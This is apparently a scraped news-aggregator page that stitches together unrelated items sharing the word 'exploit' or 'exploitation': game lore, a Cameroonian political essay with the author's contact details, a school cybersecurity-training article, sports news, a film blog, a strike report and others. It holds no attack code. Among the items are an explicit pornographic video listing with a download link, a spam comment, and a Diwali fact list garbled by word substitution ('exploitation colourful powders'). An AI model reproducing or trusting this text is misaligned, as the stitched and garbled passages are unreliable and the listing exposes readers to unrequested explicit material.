After the results of the Winter Court World Championships, Shiba Tsukune decided to put her faith in Jose Luis Saenz, who carried the Phoeniz all the way to the Top 8. He advised her to send samurai from the Asako family in order to seek the leadership of the Crab Clan, that they might aid in convincing Tadaka to return to the Phoenix—and to help point to where he can be found.

Additionally, Jose Luis was given the honor of selecting the Phoenix Clan's new elemental role and chose Keeper of Air.

Clan Effective Through April 2019 Effective Through August 2019


Phoenix


Seeker of Air


Keeper of Air

Scorpion

The Scorpion Clan has risen to a place of nearly unprecedented prestige within the Imperial Court, and Clan Champion Bayushi Shoju needs loyal samurai to ensure that the Scorpion stay loyal to the Emperor, rather than growing ambitious and emboldened as a result of their new position of dominance.

But which samurai would best serve Bayushi Shoju in this matter? That was the question the Master of Secrets presented to Johnny Shen after his distinguished finish at the Winter Court World Championships. And, in response, Johnny advised Bayushi Shoju to send samurai from the Yogo family because he (and his advisors) believed the Yogo would be willing to sacrifice everything—and anyone—to fulfill their duty.

Because his Runner-Up place finish also marked him as the top Scorpion Clan player at the event, Johnny earned the right to choose the clan's next elemental role.

Clan Effective Through April 2019 Effective Through August 2019


Scorpion


Keeper of Earth


Seeker of Air

Unicorn

The Unicorn Clan’s concerns range far and wide, from the troubled trade along the Sand Road to the appearance of intelligent, snakelike creatures in the Shinomen Mori. To these, Clan Champion Shinjo Altansarnai must add the recent recapture of Hisu Mori Toride, as the city needs a steward to guide its future, even as tensions with the Lion run ever higher.

Impressed by Ben Wootten’s Day 2 heroics at the Winter Court World Championship, Shinjo Altansarnai asked him for his advice. She then took his advice to heart, agreeing to appoint a samurai from the Moto family as steward of Hisu Mori Toride. The hope was that the Moto would rule in the style of their ancestors, bringing foreign traditions to the people of the village.

Because his finish was the highest among the members of the Unicorn Clan, Ben was also honored with the chance to select the clan's next elemental role.

Clan Effective Through April 2019 Effective Through August 2019


Unicorn


Keeper of Fire


Seeker of Water

Finding the Path

It is an uncertain time for the Emerald Empire. Tensions between the Great Clans continue to mount. Elemental imbalances speak to unrest within the spiritual realm. And the creatures of the Shadowlands continue to batter the Kaiu Wall, hunting for a weakness they can exploit.

In this time of uncertainty, the leaders of the seven Great Clans need sure guidance as they look to lead their people, venerate the kami, and serve their Emperor. For this reason, the Clan Champions have been pleased to receive the sage advice presented by the honorable samurai who best represented their clans at the 2018 Winter Court World Championships.

It is an honor to serve your clan in this way. Perhaps next year you will attend the Winter Court and help shape your clan's future. Who knows? Perhaps you'll be appointed Shogun and help find the best path forward for all of Rokugan!

Discuss this article
in our forums!

          Cameroun, mon Pays L’heure de l’éveil a sonné Par Me BLACK YONDO      Cache   Translate Page      
Résultat de recherche d'images
J’ai dit en son temps que l’heure de l’éveil a sonné.

Mes chers compatriotes, si d’aventure nos hommes politiques ont semblé prendre la politique pour un jeu, il apparaît aujourd’hui que l’heure est grave, l’avenir du pays est sombre, bien sombre.
Et si, sous ses apparences bon enfant, Paul BIYA semble avoir envoûté tout un pays pour ses intérêts égoïstes, il ne faut surtout pas sous-estimer l’homme, ce meilleur élève de la France qui, au grand jour, apparaît fort redoutable pour le pays et prêt à tout pour conserver le pouvoir.
Tenez : On est parti d’une lettre censée être une lettre de félicitations du Président MACRON au Président BIYA, mais celle-ci est devenue tout d’un coup une vraie fausse lettre, une lettre non officielle, nous dit-on. C’est sans doute ainsi que ça se passe entre coquins. On est loin, bien loin du respect et de la considération que l’on est en droit d’attendre entre deux Etats souverains, où les dirigeants ont constamment à rendre compte à leurs peuples !
C’est de la démocratie à l’ancienne, il faut le dire, une démocratie qui s’accompagne d’hommes en uniformes, d’arrestations pour murer au silence tous ceux qui osent dire non, de procès devant des juridictions sous influences.
Tel est le paysage politique du moment.
Et Vous me demandez ce que je pense depuis la proclamation des résultats de l’élection présidentielle par le Conseil Constitutionnel !
Louable préoccupation.
Mais camerounais comme moi vous l’êtes, et ce que je ressens, vous devez le ressentir, car j’ose croire que vous n’êtes pas pour le pays un touriste indifférent et insensible à tout.
Pour moi, l’élection présidentielle de 2018 est loin d’être terminée. N’en déplaise à Monsieur ATANGA NJI.
Le Cameroun, notre pays, a signé des conventions qui le soumettent à des juridictions supranationales, aussi bien dans le cadre de l’Union Africaine qu’au niveau de l’Organisation des Nations Unies, et sur ce terrain des voies de recours restent possibles, sans oublier que le dernier mot reste et restera toujours au peuple souverain.
Ce n’est pas du Professeur Maurice KAMTO dont il s’agit, ni de l’avènement à la tête de l’Etat d’un Camerounais de telle ou telle origine ethnique jugée indésirable, mais tout simplement de la question de savoir si le scrutin jusqu’à sa dernière opération peut être considérée comme juste, impartial et transparent.
Sur ce terrain, le débat reste largement ouvert et c’est bien pour l’éviter que vous voyez sillonner sur l’étendue du territoire gendarmes, militaires et policiers, armés jusqu‘aux dents comme si le pays était assiégé par une puissance ennemie dont il fallait le libérer.
Mais tous autant que nous sommes, nous devons faire attention aux actes que nous posons et aux paroles que nous laissons prospérer pour maintenir le peuple dans une pseudo balkanisation qui installe division et haine dans l’ensemble du corps social. Et le responsable en chef reste et demeure celui-là même qui devrait frapper du poing sur la table pour qu’enfin règnent le droit et la justice et que tout ce cirque prenne fin.
A la place, il s’en accommode et mieux, il semble prendre un malin plaisir à voir ses compatriotes s’étriper : on comprend ainsi le véritable sens qu’il donne à l'expression ‘’Le père de la nation’’ !
Il oublie cependant qu’il est seul responsable devant l’Histoire, responsable de la déflagration du pays, responsable de la destruction du tissu social.
Mais il y a longtemps que ce pays n’intéresse plus celui qui a montré sa vraie relation avec le pouvoir : jouir des avantages sans jamais en assumer les charges, tout en agissant comme si tout lui était dû.
Comment comprendre qu’un homme proclamé élu avec un tel score n’ait pas manifesté à cette date le moindre signe de remerciement à l’endroit de ceux de ses compatriotes qui l’ont plébiscité de la sorte.
Il y a forcément un peu de gêne dans l’air, et tout le monde l’aura ressenti, surtout après l’embarras observé lors des joutes au Conseil Constitutionnel. Ce fut un grand moment à tous points de vue.
La force de l’argumentaire a poussé les membres de ce Conseil dans leurs derniers retranchements, ne leur laissant que le choix extrême de faire constater au monde entier que pour comprendre le Droit et ses techniques, il fallait absolument être du parti au pouvoir.
On en est bien arrivé là, et le Cameroun a ainsi été ridiculisé, bien ridiculisé par des hommes et des femmes qui pourtant tenaient là l’opportunité d’entrer dans l’Histoire en usant simplement de la sagesse et en prenant leurs responsabilités, toutes leurs responsabilités. Mais les forces occultes ont été plus fortes que tout.
Et tout ceci relève d’un conditionnement tout à fait inacceptable :
Comment peut-on imaginer que l’armée, la Police, la g
Gendarmerie et toute l’Administration d’un pays moderne soient au service d’un seul individu, d’un homme qui ne le leur rend que par le mépris et l’indifférence. Ils s’obligent à s’investir dans des missions qui ne leur sont pourtant prescrites nulle part dans l’engagement qu’ils ont souscrit, lesquelles missions consistent pour l’essentiel à traquer le petit citoyen, à casser de l’opposant politique qui évolue pourtant dans un espace bien défini par la Constitution et les lois de notre pays.
C’est affligeant de voir d’un autre côté tous ceux de la préfectorale manipuler les textes et restreindre l’exercice des libertés chèrement acquises par le vaillant peuple qu’ils vont finir par pousser à bout et là, le pire peut arriver et ils en porteront l’entière responsabilité.
Mais les forces occultes ont été plus fortes que tout, dans un pays où tous les enseignants d’université, toute la haute Administration, tous les hommes d’affaires, toutes les chefferies traditionnelles, toutes les associations tribales n’ont d’yeux que pour une divinité, un totem : Paul BIYA, qui aura réussi l’exploit de nous ramener de fait au parti unique nouvelle version avec un créateur et ses créatures…
Pitoyable tout simplement, et la Divinité bombe le torse autour de concepts sans emprise aucune avec la réalité vécue par les Camerounais.
La guerre civile sévit dans deux régions du pays, le septentrion croule sous une extrême pauvreté sur fond d’insécurité, le soleil peine à se lever à l’est, de tous les coins du pays monte une colère sourde et le premier des Camerounais a tenu à organiser une élection dans une forme d’inconscience qui démontre à souhait qu’il n’est plus l’homme de la situation.
L’heure est venue de lui signifier que nous avons décidé d’arrêter les frais en lui montrant que sa prétendue victoire est une forfaiture de trop. Il s’est longtemps servi de nos divisions que son système a organisées
L’âge que je porte aujourd'hui ne m’autorise pas à jouer avec le destin de notre pays.
Au cours des derniers mois j’ai attiré l’attention du président de la République sur les dangers que son attitude faisait courir au pays face aux problèmes de l’heure que sa stratégie de pourrissement n’a pas su contenir.
On dit qu’il est l’homme le mieux renseigné du pays, j’en déduis donc qu’il a reçu tout ce que je lui ai adressé.
J’ai toujours aimé à rappeler qu’il y a un temps pour tout….
Voici venu le temps de se réveiller, de sortir de l’envoûtement collectif pour prendre notre destin en mains. Il nous sera sans doute rétorqué, selon la même rengaine : on veut envoyer les gens dans la rue. Dans la rue ?... Mais il y a longtemps que le peuple est dans la rue, vit dans la rue… Donc rien de nouveau sous le soleil !
Comment peut-on raisonnablement penser que le Peuple puisse à nouveau confier son destin pour sept longues années à un homme de 85 ans qui, en 36 ans, a largement montré ses limites en violant régulièrement et allègrement la Constitution, en semant misère, division, désolation et haine avec en prime une libre pratique du tribalisme qui nous oppose les uns aux autres tandis qu’il vaque à ses occupations.
Ce peuple à qui il n’a offert que jeux, alcool… sur les trottoirs, et stupéfiants et libertinage pour nos enfants tandis que son entourage est en permanence englué dans la luxure au point qu’il n’a pas effectué le moindre préparatif pour la campagne de son champion absent de tout et qui dilapide l’argent de tous les Camerounais dans des hôtels de luxe en Suisse et autres pays d'Europe sans être dérangé le moins du monde.
Nous allons désormais lui opposer une nouvelle forme de résistance inédite en appelant à la responsabilité de l’ensemble des corps habillés qui doit comprendre que son sort est lié à celui du peuple qu’il est censé protéger.
Nous ne pouvons plus accepter de nous laisser manipuler par un homme sur le déclin qui n’a même pas su susciter des hommes et des femmes capables d’assurer la relève : y-a-t-il pire échec ?
Nous sommes des Africains et nous savons qu’un coq à qui on a coupé la tête continue de chanter, mais il finit au fond de la marmite.
La nuit a été longue, mais le soleil se lève enfin sur le Cameroun, notre beau pays.
Debout comme un seul homme, soyons les dignes descendants des UM NYOBE, Martin Paul SAMBA, Rudolf MANGA BELL, Félix MOUMIE, Ernest OUANDIE et de tous nos héros que le monde entier nous envie.
J'ai dit./
Par Me BLACK YONDO (*)
(*) Ancien Bâtonnier de l'ordre
693 05 65 70 – 696 35 92 71
E-mail ejengueleyondo@yahoo.fr


          K–12 IT Leaders Can Mitigate Cybersecurity Risks Through User Training      Cache   Translate Page      
K–12 IT Leaders Can Mitigate Cybersecurity Risks Through User Training eli.zimmerman_9856 Tue, 11/06/2018 - 11:37

IT professionals in every K–12 school district likely grapple with one major security weakness: people.

Hackers can send malware and phishing emails, but users need to be trained how to recognize and report them — and not click. 

Forty-six percent of organizations experienced a serious data breach, according to “The Cybersecurity Insight Report” by CDW

CDW’s report notes “employees need to know what to do when faced with a threat. They also need to know how to take preventive measures to prevent malware.” Districts can take several steps to elevate the cybersecurity conversation and keep bad actors away from critical data.

One of those critical steps is making users aware of how to spot possible hacks. This should be an essential component of any training module moving forward.

Students should be taught how to become better digital citizens in order to help schools avoid data breaches. Begin by teaching them about privacy concerns and how to manage their digital identities. A good place to start is the International Society for Technology in Education’s Standards for Students. There are similar standards for educators and education leaders

MORE FROM EDTECH: Check out how schools are training students to be the next batch of cybersecurity professionals!

Time Equals Money Lost in Data Breaches

Besides the time lost when a cyberattack happens, there’s also a financial incentive to train users to steer clear of suspicious looking emails.

The Education Department announced recently it would strip any K–12 school district of Title IV funding if it did not adhere to “reasonable methods” to protect student data.

Staff should prepare for this possibility by planning and testing recovery strategies well in advance, since schools aren’t exempt from the risk of an attack.

Right now, according to the CDW report, just 30 percent of IT professionals are extremely confident their processes and people can stave off cyberattacks. The report also found that only 34 percent of IT pros are extremely confident their technology resources could mitigate risks over the next year. 

Schools should scan their networks for vulnerabilities. The CDW report shows that organizations improve their security posture with network access controls, security assessment tools and supplementary email security.

Cybersecurity professionals can choose between penetration tests and vulnerability scans

“The knowledge gained during these tests points out weaknesses that could be exploited by a real hacker and provides a roadmap for security remediation,” says Mike Chapple in a recent EdTech article

Cybersecurity Is an Ongoing Exercise in Schools

Data security should be an ongoing exercise in schools. Linnette Attai, project manager for Consortium for School Networking’s privacy initiative and Trusted Learning Environment program, told EdTech there’s no one-time, fix-all solution in risk mitigation.

Data governance policies are key, she says.

“People need training and guidance,” says Attai. “We can’t expect them to be able to understand what we mean when we say, ‘protect the privacy and security of data’ without giving them instructions on how to do that well.”

This article is part of the "Connect IT: Bridging the Gap Between Education and Technology" series. Please join the discussion on Twitter by using the #ConnectIT hashtag.

 

[title]Connect IT: Bridging the Gap Between Education and Technology

Wendy Jones is a K–12 Education Strategist for CDW•G.


          Karen Khachanov, la nuova speranza del tennis russo      Cache   Translate Page      

Dodici mesi fa Karen Khachanov partecipava alle Next Gen ATP Finals, oggi è un vincitore di un Masters 1000. Sarà la consacrazione definitiva o un semplice exploit?

L'articolo Karen Khachanov, la nuova speranza del tennis russo sembra essere il primo su Tennis Circus.


          Ryan Keely, Carter Cruise      Cache   Translate Page      
Ryan Keely, Carter Cruise
Release Year: 2018

New reform school instructor Ryan Keely has met her match in sociopathic student Carter Cruise. Carter sniffs out weakness in her teacher, curvy beauty Ryan, and plans to exploit it in any way she can. Sexy blond stunner Carter is craving some hot lesbian sex and her busty teacher is the perfect target for her lustful desires. The two begin kissing, then Carter dives deep into Ryan«s nether regions bringing her to orgasm. Both ladies continue to get each other off with their fingers and tongues, probing each other»s wet cunts, stopping at nothing to have as many orgasms as humanly possible. Ryan may like this new teaching position!

Format: mp4
Duration: 23:20
Video: 1920x1080, AVC (H.264), 4567kbps
Audio: 187kbps

Ryan Keely, Carter Cruise Ryan Keely, Carter Cruise
Ryan Keely, Carter Cruise Ryan Keely, Carter Cruise

Ryan Keely, Carter Cruise
File size: 813.4 MB

Ryan Keely, Carter Cruise

Ryan Keely, Carter Cruise
http://svalka.ws/
           Exploitation procedure based on eigenvector revisited: the concept of weighted preference flows in multicriteria outranking analysis       Cache   Translate Page      
Chenayah, S. and Takeda, E. (2008) Exploitation procedure based on eigenvector revisited: the concept of weighted preference flows in multicriteria outranking analysis. Cybernetics and Systems Analysis, 39 (1). pp. 61-78. ISSN 0196-9722
          Comment activer Windows 10 avec une clé de produit Windows 7 ?      Cache   Translate Page      

Windows 7 est loin d’être un système d’exploitation dépassé cependant sa fin de vie approche et l’adoption de Windows 10 sera nécessaire. Microsoft a prévu d’abandonner Windows 7 en janvier 2020. A cette date, il sera livré à lui-même. En clair le géant ne proposera plus de mise à jour de sécurité et de corrections ...

The post Comment activer Windows 10 avec une clé de produit Windows 7 ? appeared first on GinjFo.


          PELÍCULA COMPLETA 'Star Crash' (1978) | Caroline Munro y Nadia Cassini como 'Mitos eróticos' de la serie B europea | Sexploitation      Cache   Translate Page      


El cine de culto es difícil de definir ya que una obra tanto puede ser elegida como tal por su gran calidad, como por su despropósito. El caso es que en ambos caso, es el público el que por una desconocida razón, le otorga ese título de obra especial distinta y por alguna razón magnética para él. Hoy vamos a hablar de Star Crash, una película que queda muy claro que su condecoración de filme de culto no es claramente pos su calidad ya que estamos posiblemente ante una de las peores películas de la historia. Eso sí, una vez que la pones algo te obliga a terminarla.

Si los italianos fueron capaces de dejar obras notables al imitar al cine norteamericano en géneros como el oeste o el terror, en la ciencia ficción los resultados fueron casi siempre catastróficos. Y no es que “Choque de Galaxias” sea la excepción, ni mucho menos, pero de entre toda la chatarra parida tras la estela de “La Guerra de las Galaxias” merece destacar por los siguientes puntos:

  • Caroline Munro. Musa de la Hammer y que aquí vuelve a demostrar que sus dotes físicas son inversamente proporcionales a su talento interpretativo.
  • Christopher Plummer. El principal responsable del pésimo nivel de los efectos especiales y del tropel de chicas en bikini, ya que su sueldo se comió el presupuesto para maquetas, decorados y vestuario. Su arenga final mirando a cámara es uno de los alegatos más estremecedores contra el consumo de drogas que se haya filmado jamás.
  • David Hasselhoff. Debutaba en un título a su altura para demostrar que la suya ha sido la carrera más constante de la Historia del Cine: siempre ha sido igual de malo.
  • John Barry. Deja una muy meritoria banda sonora que hubiera ganado un par de puntos si hubiera prescindido de unos arreglos setenteros. Años después, una elaborada variación del tema central le valdría el Oscar por “Memorias de África”.

Pero posiblemete, la gracia de este filme reside en un aspecto: Su impresionante estética pop y es que, vista hoy, la película sigue siendo un auténtico festival para los sentidos. El 'Pop Art' o arte Pop se desarrolló dentro de la cultura de masas y del marco del capitalismo y la reproducción industrial haciendo que todo el mundo pueda acceder a él y conocerlo. Las obras nacidas al abrigo de esta corriente, se basaban, principalmente, en la carga visual y el lenguaje figurativo y además, no hay que olvidar el tono humorístico e irónico del que se cargan estas obras. Y eso es perfecto lo que mejor define a Star Crash, una oda a al color y a lo cotidiano hecho arte que sin darse cuenta abraza los cánones del humor para crear lo que es. Uma misteriosa obra de culto que te hipnotiza sin darte cuenta. Y es que, hasta la galaxia es de colores.

PELÍCULA COMPLETA CASTELLANO BY CINEMATTUBE CINEMATTE

Caroline Munro, la estrella de las estrellas de colores



Y ya de paso, aprovechamos uno de los clásicos pulp de la ciencia ficción de los 70 para hablar de Caroline Munro, una de las grandes reinas de la serie B de los años 70 y 80, una actriz y modelo inglesa, conocida por su participación en películas de terror y ciencia ficción de las décadas de aquellos años, y por su papel como la chica Bond Naomi en La espía que me amó de 007. Su otra gran aportación a la industria fue como decimos 'Star Crash, choque de galaxias', un film nacido bajo la sombra de La Guerra de la Galaxias y que sirvió de puente e inspiración para ese otro gran clásico Pulp llamado Flash Gordon. Ahora es uno de los nombres más buscados de IMDb.
Aunque actualmente Star Crash es un despropósito como gran producción, no hay que desestimar que en su día se quiso contar con lo mejorcito para competir con el film galáctico por excelencia, por otro lado de una poderosa y lógica influencia. Por un lado se contrató como ya hemos dicho al mismísimo John Barry para la banda sonora y al cual no se le dejaba ver la película durante su producción por si aquél decidía abandonar el proyecto. Y en su reparto estaban como también hemos dicho, nuestra protagonista Caroline Munro, el mismo David Hasselhoff y los serios Christopher Plummer y Marjoe Gortner.


Añadir siempre que la gracia de esta película está en verla con un amplio sentido de la perspectiva y con sentido del humor, algo que no creo pueda conseguir todo el mundo. Los conjuntos que luce Munro son para recordar, otras cosas para divertir.
Por cierto, no queremos olvidar la aparición de Nadia Cassini, una preciososa pin-up de aquellos años que aquí hace un cameo como reina Corelia y a la que al final le dedicamos otra galería sexy in hot by Cinematte.

Caroline Munro, la B Queen europeo de los 70 y 80

Caroline Munro nació el 16 de enero de 1949 en Inglaterra. Comenzó su carrera en el medio artístico en 1966, cuando su madre y un fotógrafo amigo del colegio de artes donde estudiaba, enviaron unas fotos para el concurso "Face of the Year" del diario Evening News y ganó, siendo elegida por el famoso fotógrafo David Bailey. Esto la llevó a una carrera como modelo, en la que su primer trabajo fue para la revista Vogue británica, a los 17 años. Luego se mudó de Windsor a Londres, donde hizo varios anuncios para TV, fotos para portadas de revistas y cameos en algunas películas los cuales fueron el inicio de su carrera como B Queen de los 70 y 80. En 1971, el presidente de Hammer Productions, antigua y famosa productora de películas de terror y ciencia ficción de Inglaterra, le ofreció un contrato y Munro comenzó a hacer películas, por lo cual sería mejor conocida como el clásico El abominable Dr. Phibes, con el nombre más grande en el género, Vincent Price. Fue la única actriz en tener un contrato a largo plazo con Hammer en toda la historia de la productora. Captain Kronos: Vampire Hunter y The Golden Voyage of Sinbad en 1974 fueron dos éxitos de público en el género de terror y ciencia ficción de bajo presupuesto entre los varios que protagonizó en los años 70, hasta llegar al papel que la haría popular en todo el mundo. 


En 1977, Munro rechazó la oportunidad del papel de la villana Ursa en Superman, para hacer la que sería su aparición más célebre de la película, como Naomi, la piloto de helicóptero y asistente del villano Karl Stromberg, que coquetea con James Bond mientras intentaba dispararle desde su helicóptero en La espía que me amó. Cubby Broccoli, productor de las películas de 007, impresionado con su fotogenia, le aconsejó firmemente ir a los Estados Unidos a intentar una carrera más lucrativa, pero Munro decidió quedarse en Europa junto a su familia. Munro continuó trabajando en numerosas películas de horror y ciencia ficción británicas y europeas a través de los años 70 y 80, en particular Starcrash (1979) con David Hasselhoff y Christopher Plummer. El diálogo de Munro fue redoblado completamente por otra actriz, incluso para las impresiones en idioma inglés de la película. La carrera de Munro continuó prosperando en los años 80, continuando haciendo películas de terror y ciencia ficción de bajo presupuesto en Europa, principalmente en Italia, y en un trabajo constante aunque de poca proyección, filmando también Estados Unidos en la segunda mitad de la década, en cine B. 

Durante estos años también aparece en la televisión y fue una famosa pin-up en los medios, aunque nunca posando desnuda, apareciendo en videoclips musicales para estrellas de rock como Adam Ant y Meat Loaf. Desde los años 90, ha limitado su trabajo en la pantalla a apariciones en películas para televisión y documentales.

Galería sexy in hot by Cinematte de Caroline Munro


















Galería de Nadia Cassini, la otra estrella de las estrellas












          Comment on Anette Dawn by poker88      Cache   Translate Page      
*Cheap Replica Handbags You guide me by sharing this toolbox i face problem whenever i exploit this promotion reading your blog i am able to easily use.
          Africa: Britain Boosts Support for Slavery Victims After Court Challenge      Cache   Translate Page      
[Thomson Reuters Foundation] London -At least 13,000 people across Britain are estimated by the government to be victims of forced labour, sexual exploitation and domestic servitude
          UN recorded 64 new allegations of sexual exploitation or abuse in past three months      Cache   Translate Page      
none
          11/7/2018: History: Previous solution:      Cache   Translate Page      
elope expel expert expire exploit EXPLOITER explore export leper lope oxlip peel peer pelite pelt peri peril pert peter petiole petrel petrol pier pile pilot piolet pixel plie plier plot poet pole poler polite pore port prolix repel repot reptile ripe...
          U-Boot's Trusted Boot Validation Bypassed       Cache   Translate Page      
Memory handling issues in U-Boot open-source bootloader for embedded devices make possible multiple exploitation techniques that lead to arbitrary code execution. [...]
          Flaws in Popular SSD Drives Bypass Hardware Disk Encryption      Cache   Translate Page      
Researchers have found flaws that can be exploited to bypass hardware decryption without a password in well known and popular SSD drives. [...]
          10 Facts you need to know about Diwali      Cache   Translate Page      


When is Diwali?

The exact dates change every year, however, this year, Diwali 2018 falls on weekday 7th November.

Facts about Diwali

  1. Diwali is a famous religious festival originating in India. individuals typically consider Diwali as a Hindu festival, however, it's additionally celebrated by Sikhs and Jains.
  2. Diwali takes place annually and lasts for 5 days, marking the beginning of the Hindu New Year. The precise dates change every year and are determined by the position of the moon – however it always falls between October and November.
  3. The word Diwali (or Deepavali as it’s typically called) suggests that “row of lights” in an Ancient language of Asian nation, known as Sanskrit. Throughout this festival, individuals beautify their homes with lights and oil lamps, known as Diyas.
  4. For several people, Diwali honours the Hindu god of wealth, Lakshmi. The lights and lamps are aforementioned to assist Lakshmi to notice her manner into peoples’ homes, transferral prosperity within the year to come!
  5. It’s additionally a celebration of excellent triumphing over evil, and completely different legends supported this theme are related to Diwali. In northern India, Hindus celebrate the come back of the deities (gods) Rama and Sita to the town of Ayodhya, when defeating the evil king Ravana!
  6. Within the region of the geographical area, individuals worship the god Kali, the destroyer of evil forces, throughout Diwali. And in an Asian country (a country bordering north-east India), individuals celebrate Lord Krishna’s success over the wicked king Narakaasura.
  7. However, it’s not almost lights and legends –– Diwali could be a time to possess fun with friends and family! people exchange gifts and sweets, fancy delicious feasts, watch firework displays and wear new garments. It’s a time to wash and beautify your home, too.
  8. Rangoli could be a popular Diwali tradition –– lovely patterns created exploitation colourful powders and flowers. people draw rangoli on the ground by the doorway of their homes to welcome the gods and convey sensible luck!
  9. Today, this fascinating festival is well known by thousands of individuals in countries all round the world. throughout Diwali, Hindus living outside India gather at places of worship known as mandirs to depart offerings to deities, watch firework displays and eat delicious food together!
  10. Town of Leicester, within the uk, holds the biggest Diwali celebrations outside of India. Every year, tens of thousands of people take in the streets to fancy vivacious shows of sunshine, music and dancing!
Related post: Unique Gifts to Spread the Happiness of the Famous Diwali Festival
          A united fight against Cal      Cache   Translate Page      

Frank Jones reports on a three-day strike in October by University of California workers, who are winning increasing support from UC students.

“They want service workers to be even lower, allthough it’s already the lowest level of employment. But we are the most important workers in the university. If there’s nobody cleaning the surgery rooms, patients are at risk. If we don’t cook meals, students cannot live here nor can they have classes. We maintain the medical centers, the therapy places, we are the spine (the center pillar) of this university. We demand respect.”
— Maricruz Manzanarez, UC Berkeley lead custodian and AFSCME 3299

SOME 24,000 members of AFSCME Local 3299 and 11,000 workers represented by University Professional and Technical Employees (UPTE) Local 9119 launched a second three-day strike against the University of California (UC) system last month, following a similar job action in May.

As a show of solidarity, many graduate student workers in UAW Local 2865 canceled or moved classes off-campus. Some UC librarians and members of the University Council-American Federation of Teachers (UC-AFT), who held their own protest a week earlier, also refused to cross pickets.

The strike started at 6 a.m. on Tuesday, October 23. At UC Berkeley (UCB), 200 pickets gathered at the corner of Bancroft and Telegraph. AFSCME and UPTE picketers and supporters marched through the student gym and rec center, the Tang health center and on to a dining hall where excited picketers turned back two scab food deliveries.

University of California staff strike against outsourcing and exploitation
University of California staff strike against outsourcing and exploitation (AFSCME 3299 | Facebook)

Student solidarity pickets went up at Sather Gate. On Wednesday, 150 UPTE workers kept the Bancroft and Telegraph university picket going while most workers attended an inspiring 1,000-person rally at the UC San Francisco (UCSF) picket line, where they were joined by striking Marriott hotel workers. Jovanka Beckles, a DSA-endorsed candidate running as a Democrat for California State Assembly, visited the picket line Thursday.

Local 3299 is demanding annual cost of living increases of 5.5 percent to deal with California’s rapidly rising cost of living, as well as a freeze on health care premiums and copays. UC is only offering 2 percent raises and no limits on premium increases and co-pays.

The union is also looking to stop the contracting out of union jobs, to guarantee overtime pay for daily overtime work, and to limit parking cost increases to under 2 percent, while the university wants to remove combined severance and recall rights for laid-off employees, pay overtime only when workers exceed 40 hours in a week, and retain the right to jack up parking costs.

“There is more than enough money in California that can pay for their contract and improve education,” said Wendell, a lead janitor at UC Berkeley. “It’s ridiculous that the chancellors and regents make more than several workers’ salaries combined.”

Manzanarez made the case for why the strike was necessary:

Now we don’t have a contract and the university proposal conveys benefits cuts and a meager salary. They also want to change our pensions, convert them to 401k, which means it’s a lottery. It’s betting our retirements to the well-being of companies, and if there is bad luck, as in 2009 to lose it assuming the losses of capitalism... The premiums for health care are increased...They want to give us a 3 percent raise, but parking increases 10 percent and health care increases between $25 and $30.


THIS PAST strike saw an increase in student solidarity compared to the strike in May. A week before the strike began, students formed a solidarity committee, which publicized the strike through leaflets and held down pickets.

The UC Berkeley chapter of the International Socialist Organization (ISO), the Young Democratic Socialists of America (YDSA) and independent solidarity activists provided the initial impetus for the committee, which started out by flyering the campus about the strike.

On the first day of the strike, the committee picketed Sather Gate, the main gateway to campus. The next day on Wednesday, a couple dozen students formed a solidarity picket that shut down the Golden Bear Café.

“Golden Bear Café is a very popular cafe on campus where people can get food and coffee and even buy books,” explained KT, a UCB undergrad and ISO member, “and so by picketing them today we are preventing them from making a lot of money. AFSCME workers work here and they’ve walked off the job and so we’re trying to show solidarity by strengthening their strike and trying to bring down the university.”

“The closest thing that I’ve done to this was last weekend with the Marriott strike, which was essentially the same thing, being out and showing solidarity so that people can actually get living wages and be able to live their lives,” said Nedra, an undergraduate at nearby Mills College.

“It’s important because we need to make sure that more people know that this is going on, and so the more people that come out the more attention this is going to get and it’s going to be in people’s faces.”

Importantly, the Cal Black Student Union (BSU) decided not to hold an event at the café after being contacted by the student solidarity committee.

The structural racism at the UC is an argument for ongoing solidarity: just 3 percent of UCB students are African Americans, who make up 7 percent of California’s total population. Latinx/Chicanx folks make up just 14 percent of undergraduates but are 38 percent of the state.

These numbers mirror the racist pay practices at UC, where Black and Latinx AFSCME workers make 20 percent less starting wage than white workers. Outsourced workers make even less, and while there is not official data on the demographics of these employees, 96 percent of respondents to AFSCME’s contractor survey were people of color.

During the first three-day strike in May, it seemed that job actions between Local 3299 and graduate student workers in UAW Local 2865 might coincide. The graduate workers ratified their contract in August, however, and the administration sent out letters in October warning Local 2865 members to continue classes as normal.

UAW leadership informed their members that they have a legal right to respect picket lines as “individuals” but said that the union couldn’t legally organize its members to do so. The strength of the rank-and-file graduate student network needed to collectively organize “individual” acts of solidarity is uneven, and therefore so was strike support.

Some departments like Sociology showed almost complete solidarity, with members canceling classes or teaching off campus, but that wasn’t the case for many other departments.

With more advance planning, the solidarity committee could be a part of organizing more class cancellations, basic strike education, strike fund and picket support. The student solidarity committee plans to keep meeting in case the administration refuses to negotiate fairly.


THE UNIVERSITY hasn’t moved on the union’s major demands since May, and if management continues to hold out after the October strike, it will raise important questions for UC workers about next steps. Some are already feeling frustrated.

“Co-workers are not feeling too good about the strike,” said Sylvia Heredeia. “They feel like they are just management’s toy, given that this is the second strike and there are still no contracts in place. The strike should be longer until they actually get the contract...People are also beholden to other obligations (bills, family, etc.) so it is a tough call as to what is possible.”

Most picketers who spoke to Socialist Worker wanted to disrupt the university for longer than three days if necessary. Like Heredeia, however, all were concerned with the hardship this would mean for their co-workers.

Local 3299 President Kathryn Lybarger explained to Socialist Worker last week that short strikes in the hospital sector can be very disruptive, but not all the bargaining units are striking medical facilities.

As UC workers figure out their next steps, students should continue to organize labor solidarity, not only to help win social and economic justice for AFSCME and UPTE workers, but also to give their fellow students lessons in how the university is run according to the logic of capitalism, and how we can come together to fight for different priorities. UCB undergrad and YDSA member Aleah put it well on the Golden Bear Café picket line:

When the university is simultaneously trying to increase class sizes and increase tuition, while they are decreasing wages and cutting benefits, those are two sides of the same coin — the greed and corruption of the leaders of our universities. So the regents and the chancellors have demonstrated their absolute unwillingness to recognize the value of putting people over profit.

When we fight for workers’ rights, we are pushing back against that in a way that supports us fighting for our own issues, decreasing tuition, eliminating tuition, getting the educations that we deserve. I want to be at a university where I’m getting the education that I deserve and the people who work here are getting the wages, the conditions and the livelihoods that they deserve.

Xavier Durham, A. Robertson, Alex Schmaus and Alessandro Tinonga contributed to this article.

           Ligue des champions: Paris manque l'exploit à Naples mais sauve ses chances de qualification       Cache   Translate Page      

Naples (Italie) - L'enfer promis du San Paolo a failli se transformer en paradis : le Paris SG, incapable de profiter de la défaite de Liverpool en concédant le nul sur le terrain de Naples (1-1) mardi soir, reste troisième du groupe "de la...

